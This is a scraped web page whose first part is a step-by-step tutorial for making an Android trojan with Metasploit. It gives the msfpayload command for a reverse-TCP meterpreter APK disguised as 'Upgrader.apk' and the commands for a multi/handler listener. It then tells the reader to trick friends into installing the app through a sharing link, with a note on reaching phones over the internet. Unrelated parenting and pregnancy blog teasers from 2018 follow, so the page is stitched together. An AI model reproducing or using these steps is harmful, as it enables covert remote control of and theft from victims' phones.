- Open a terminal, and make a Trojan .apk
- You can do this by typing :
- msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
- You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2: Open Another Terminal:
- Open another terminal until the file is being produced.
- Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
- After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
- Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
- To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
- At last type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
- Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
- Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
- Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
- However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
- And when he clicks Open…
Step 5: BOOM!
There comes the meterpreter prompt:
The Perfect Pregnancy Weight
Putting on weight during your pregnancy is unavoidable, but that doesn’t mean that you have to dread it! Weight gain throughout...September 15, 2018
Help Your Children Evolve from Enemies to Best Friends
Family fighting and bickering can cause a once peaceful and loving home to become a dreadful, dreary place. One of the...September 13, 2018
Organize Your Kids and Your Life With These 8 Simplification Tips
Do you cringe every time you walk into your toddler’s room? Tired of finding toys scattered throughout the living room? When...September 12, 2018
Motherhood: What I packed (and used) in my hospital bag
Throughout my entire pregnancy, I relied on my favorite blogs to help answer any questions that I had about everything and...September 6, 2018
Don’t Let Smartphones Ruin Your Relationships: Tips to Maintain Good Communication
Mobile phones are no longer just for making telephone calls. We use our smartphones for directions, to send text messages, to...September 2, 2018
The Start of Something New
Starting a family with your partner is a big choice that you will both endure together. Sometimes it is preplanned, other...August 30, 2018
6 Things You Probably Forgot in Your Personal Finance Budget
If you have made a monthly or weekly budget, congratulations! You’ve now taken a step that most people instinctively avoid. Personal...August 28, 2018
So you’re pregnant – you gotten this far! You’ve been eating healthy, getting prenatal checkups regularly, and engaging in some b***...August 28, 2018
6 Discussions You Must Have With Your Partner Before Having a Child
So you got married and are in a stable relationship, and now you’re ready to have a child. What could go...August 26, 2018